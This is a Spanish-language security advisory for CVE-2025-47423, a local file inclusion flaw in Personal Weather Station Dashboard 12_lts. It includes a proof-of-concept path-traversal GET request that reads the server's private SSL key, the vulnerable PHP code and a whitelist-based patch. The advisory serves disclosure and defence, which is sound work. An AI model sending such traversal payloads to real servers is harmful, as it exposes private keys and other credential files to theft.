
Divulgación detallada de CVE-2025-47423: Inclusión de Archivos Locales en Personal Weather Station Dashboard 12_lts. Incluye PoC, análisis de código vulnerable y recomendaciones de parche seguro para aprendizaje defensivo.
Descubierto por: Matthew Eagle
Estado: Divulgación Pública
Fecha de Reporte: 2025-05-05
ID CVE: CVE-2025-47423
Una vulnerabilidad de Inclusión de Archivo Local (LFI) en Personal Weather Station Dashboard versión 12_lts permite a atacantes remotos no autenticados leer archivos arbitrarios en el servidor. Explotar esta falla permite acceder a archivos sensibles, incluyendo claves SSL privadas, comprometiendo potencialmente la confidencialidad e integridad de las conexiones HTTPS.
/others/_test.phptest (vía GET)Esta falla permite a atacantes remotos:
server.key)CVSS: 5.8 Medio
GET /others/_test.php?test=../../../apache/conf/ssl.key/server.key HTTP/1.1
Host: www.example.com
Respuesta:
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAs2omMqKSB+lm7xu9Nu3C5...
...TRUNCATED...
-----END RSA PRIVATE KEY-----
$script = trim($_GET['test']);
$script = str_replace('../','',$script);
include($script);
str_replace es insuficiente para prevenir la traversal de directorios.
basename() y verificar contra archivos permitidos$allowed_tests = ['index.php', 'module_test.php'];
$script = isset($_GET['test']) ? basename($_GET['test']) : 'index.php';
if (!in_array($script, $allowed_tests)) {
die("Invalid test file.");
}
include(__DIR__ . '/scripts/' . $script);
| Fecha | Evento |
|---|---|
| 2025-05-05 | Vulnerabilidad reportada a los moderadores de PWS Dashboard |
| 2025-05-06 | Reconocimiento y pruebas observadas |
| 2025-05-07 | CVE-2025-47423 reservado vía MITRE |
| TBD | Parche público y listado CVE pendiente |
Si está ejecutando Personal Weather Station Dashboard 12_lts, debe:
_test.php inmediatamenteVulnerabilidad descubierta y divulgada responsablemente por Matthew Eagle
Contacto: [email protected]
Divulgación coordinada respetando las pautas de divulgación responsable. Este documento se publica con fines educativos y defensivos.